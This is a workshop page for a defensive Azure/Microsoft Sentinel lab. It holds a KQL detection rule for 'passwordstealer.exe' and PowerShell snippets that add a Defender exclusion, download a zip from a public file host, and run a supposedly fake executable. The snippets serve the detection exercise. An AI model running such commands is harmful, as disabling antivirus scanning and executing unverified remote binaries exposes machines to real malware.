Defensive Cybersecurity Workshop

Welcome to the Defensive Cybersecurity Workshop, a hands-on cybersecurity workshop where students deploy their own cloud-based security infrastructure using Microsoft Azure and Microsoft Sentinel. This immersive experience lays the foundations for real-world blue team skills in detection, investigation, and response to modern cyber threats.


Workshop Slides

View the full slide deck below or open it in a new tab to copy text and explore in detail.

Open Workshop Slides

Copy Snippets

Below are the key snippets needed for the workshop.

Detection Rule (Slide 6.5)

Event
| where EventID == 4688
| where EventData contains "passwordstealer.exe"
| project TimeGenerated, Computer, EventID, RenderedDescription

Download Fake Executable (Slide 7.1)

$zipUrl = "https://files.catbox.moe/yjkxr7.zip"
$zipPath = "$env:TEMP\passwordstealer.zip"
$extractPath = "$env:TEMP\passwordstealer_final"
Add-MpPreference -ExclusionPath $extractPath
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

Launch Fake Executable (Slide 7.2)

Start-Process "$extractPath\passwordstealer.exe"